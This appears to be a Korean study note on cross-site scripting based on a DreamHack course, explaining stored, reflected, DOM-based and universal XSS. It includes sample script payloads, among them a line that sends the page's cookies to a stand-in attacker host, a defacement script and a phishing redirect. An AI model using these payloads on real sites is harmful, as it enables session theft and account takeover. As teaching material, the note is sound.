DH Web Hacking

✏️ClientSide: XSS

📌Cross Site Scripting (XSS)

XSS는 클라이언트 사이드 취약점 중 하나로, 공격자가 웹 리소스에 악성 스크립트를 삽입하여 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있다. 공격자는 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있다.

해당 취약점은 SOP 보안 정책이 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 이전에 비해 힘들어졌다. 그러나 이를 우회하는 다양한 기술이 소개되면서 XSS 공격은 지속되고 있다.

클라이언트는 서버로부터 받은 응답, 즉 HTML, CSS, JS 등의 웹 리소스를 시각화하여 이용자에게 보여준다. 이때, HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있다.

📌XSS 종류

종류	설명
Stored XSS	XSS에 사용되는 악성 스크립트가 서버에 저장되고 응답에 담겨오는 XSS
Reflected XSS	XSS에 사용되는 악성 스크립트가 URL에 삽입되고, 서버의 응답에 담겨오는 XSS
DOM-based XSS	XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS * Fragment는 서버 요청/응답에 포함되지 않는다.
Universal XSS	클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS

📌XSS 예시

🔷 쿠키 및 세션 탈취 공격 코드

<script>
// "hello" 문자열 alert 실행.
alert("hello");

// 현재 페이지의 쿠키(return type: string)
document.cookie; 

// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);

// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";

// new Image() 는 이미지를 생성하는 함수이며, 
// src는 이미지의 주소를 지정. 
// 공격자 주소는 http://hacker.dreamhack.io

// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 
// 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>

🔷 페이지 변조 공격 코드

<script>
// 이용자의 페이지 정보에 접근.
document;

// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>

🔷 위치 이동 공격 코드

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 

// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>

📌Stored XSS

Stored XSS는 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS이다. 대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있다.

특정 사이트에서 XSS 취약점이 존재할 경우 게시물 등의 내용을 그대로 출력하므로, <script> 태그 또는 HTML 태그가 불특정 다수에게 보여지므로 높은 파급력을 가진다.

📌Reflected XSS

Reflected XSS는 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생한다. 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식이 있다.
이용자가 게시물을 검색하면 서버에서는 검색 결과를 반환한다. 일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생할 수 있다.

Reflected XSS는 URL과 같은 이용자의 요청에 의해 발생한다. 따라서 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 한다. 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용된다.

📌Stored, Reflected XSS의 차이점

Reflected XSS는 악성 스크립트가 이용자 요청 내에 존재한다.
공격자가 조작한 서비스 URL을 사용자에게 제공하여 사용자는 공격자의 URL을 입력 후 서비스에 요청한다.
서버는 공격자의 스크립트에 응답하며, 공격자의 스크립트는 사용자의 브라우저에서 실행된다.
이후 사용자의 브라우저가 공격자에게 중요정보를 전달한다.

Stored XSS는 악성 스크립트가 서버 내에 존재한다.
공격자는 서버에 악성 스크립트가 담긴 내용을 저장한다.
사용자가 공격자가 저장한 내용을 열어보면,
서버는 공격자의 스크립트에 응답하며, 공격자의 스크립트는 사용자의 브라우저에서 실행된다.
이후 사용자의 브라우저는 공격자에게 중요정보를 전달한다.

두 공격모두 결과적으로는 동일한 행위를 할 수 있다고 볼수있다. 하지만 악성 스크립트가 존재하는 위치, 동작하는 과정이 다르므로 필요한 조치 역시 다르다는 것을 알아야 한다.

References

DreamHack 강의: ClientSide: XSS
Reflected, Stored XSS의 차이점